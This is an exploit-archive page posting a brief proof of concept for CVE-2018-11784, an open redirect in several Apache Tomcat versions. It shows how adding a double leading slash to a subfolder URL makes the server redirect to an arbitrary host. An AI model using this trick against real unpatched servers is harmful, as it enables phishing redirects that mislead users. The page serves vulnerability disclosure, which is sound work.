Apache Tomcat 9.0.0M1 Open Redirect

Apache Tomcat 9.0.0M1 Open Redirect: Posted Jul 11, 2021; Authored by Central Infosec; These are details on an open redirection vulnerability in Apache Tomcat version 9.0.0M1 that was discovered in 2018.; tags | exploit; advisories | CVE-2018-11784; SHA-256 | e374b72f534a0d9e0f9dad4d4370a5f0b3b70a15b8a074782e0503384eb02aab; Download | Favorite | View

Apache Tomcat 9.0.0M1 Open Redirect

# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
http://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test

# Browse to the newly created URL and the application will perform a redirection
http://test/

Top Authors In Last 30 Days

Red Hat 210 files
indoushka 182 files
Ubuntu 93 files
Gentoo 32 files
Debian 18 files
Matthias Deeg 11 files
Chris Beiter 11 files
Frederik Beimgraben 11 files
Apple 10 files
malvuln 8 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,135)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,421)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,899)
UNIX (9,465)
UnixWare (188)
Windows (6,782)
Other

Apache Tomcat 9.0.0M1 Open Redirect

Apache Tomcat 9.0.0M1 Open Redirect

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Apache Tomcat 9.0.0M1 Open Redirect

Share This

Apache Tomcat 9.0.0M1 Open Redirect

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems